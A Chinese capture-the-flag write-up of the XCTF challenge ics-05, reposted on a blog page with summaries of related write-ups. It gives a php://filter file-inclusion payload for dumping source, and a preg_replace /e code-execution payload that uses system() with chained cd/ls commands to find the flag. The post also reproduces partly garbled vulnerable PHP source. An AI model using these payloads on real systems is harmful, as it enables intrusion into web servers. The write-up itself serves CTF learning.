攻防世界-ics-05

546669204 发布于2021-11-19 09:40 / 1094人阅读

点开后发现只有设备维护中心可以点开

看到数据端口请求异常，先想到用burp修改域名，但是修改后

除了加了一句话没什么用

看看源代码，有page=index(看wp的，真想不到和文件包含有关)

看了wp后发现文件包含是有标志的

?page=php://filter/read=convert.base64-encode/resource=index.php

应该是base64

                        设备维护中心                云平台设备维护中心
    
            设备列表    
    
                    



            
    



        



                                     0) {                    die();                }                if (strpos($page, "ta:text") > 0) {                    die();                }                if (strpos($page, "text") > 0) {                    die();                }                if ($page === "index.php") {                    die("Ok");                }                    include($page);                    die();                ?>        
        



Welcome My Admin ! 
";    $pattern = $_GET[pat];    $replacement = $_GET[rep];    $subject = $_GET[sub];    if (isset($pattern) && isset($replacement) && isset($subject)) {        preg_replace($pattern, $replacement, $subject);    }else{        die();    }}?>

得到上面的html代码，中间有一段php代码

好吧，

还是要伪造ip，那就伪造一个吧

后面就是没接触过的知识点了

preg_replace()函数的/e漏洞
正确的php system()函数的书写

preg_replace($pattern, $replacement, $subject)
作用：搜索subject中匹配pattern的部分，以replacement的内容进行替换。
$pattern: 要搜索的模式，可以是字符串或一个字符串数组。
$replacement: 用于替换的字符串或字符串数组。
$subject: 要搜索替换的目标字符串或字符串数组。

简单来说就是替换字符串

(29条消息) preg_replace() /e代码执行漏洞_2021！的博客-CSDN博客

（这是比较详细的介绍，大概看懂了，但是反向引用还是有点懵）

总之

mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )

pat要代替sub中的部分字符串，sub中一定要出现pat的内容，否则会错误，无法执行

rep是这个漏洞的重点，会执行rep中的命令

?pat=/mmm/e&rep=system("ls")&sub=mmmyyy

格式大概就是这样的

继续执行命令

cd+s3chahahaDir%26%26+ls

这段代码看着复杂其实也好理解，进入（cd）s3chahahaDir文件在命令执行成功后（%26%26=>&&）查看文件（ls）

然后可以进入flag

cd+s3chahahaDir/flag%26%26+ls

发现flag.php后可以查看文件

注意，无论是进入文件夹还是查看文件都要有完整的路径

idc机房托管服务器托管攻防攻防战 ddos攻防 linux安全攻防

文章版权归作者所有，未经允许请勿转载,若此文章存在违规行为，您可以联系管理员删除。

转载请注明本文地址：https://www.ucloud.cn/yun/123879.html

【攻防世界】十七、ics-05

摘要：函数查找在另一字符串中第一次出现的位置大小写敏感。规定要查找的字符串。要搜索替换的目标字符串或字符串数组。修正符使将参数当作代码在适当的逆向引用替换完之后。提示要确保构成一个合法的代码字符串，否则会在报告在包含的行中出现语法解析错误。 ...

Sunxb 2021-10-14 09:42 评论0 收藏0
攻防世界---ics-05

摘要：用于替换的字符串或字符串数组。那么漏洞又是什么呢函数还有一个模式。点进场景看到是很炫酷的页面,题目秒速的是:系统设备维护中心的后门入侵系统,那直奔那里进来发现什么也没有,到处点一点在点击时, url发送了变化出现?page=index 那么联想到可能存在利用文件包含读取网页源...

wangbjun 2021-09-28 09:34 评论0 收藏0
攻防世界之labour

摘要：攻防世界之这题是一个装呗题当我得到这个文件的时候额这是个什么玩意似乎像怎么个东西，但是又好像不是思索不出办法的我，只能看向那个门口了哎不是这个门口也不是这个门口到底是那个门口呢这就不说了后来当我发现这是一个位置信息的时 ...

WilsonLiu95 2021-09-28 09:35 评论0 收藏0
[一千道逆向题] 攻防世界1-5题刷题题解(偏动调)

摘要：目录前言前言立了个，刷满一千道逆向。先从攻防世界开始。查壳新手区应该没壳，下面不查了。逻辑很清晰，你可控的输入点在，然后把你输入的每一个字符以进制读取存到，最后再用和进行比对。 ...

番茄西红柿 2021-11-17 09:33 评论0 收藏0
攻防世界 web进阶区 NewsCenter

摘要：标题攻防世界进阶区最近刚入这一块想想写了道，新手勿喷这也是我第一次写博客先看题目点开来是这样的界面说实话一开始没有头绪，看着这个界面觉得很奇怪，但是基于之前写过的几道题我还是按开了开发者视图，在里面找了很久没发现什么有 ...

nodejh 2021-10-12 10:11 评论0 收藏0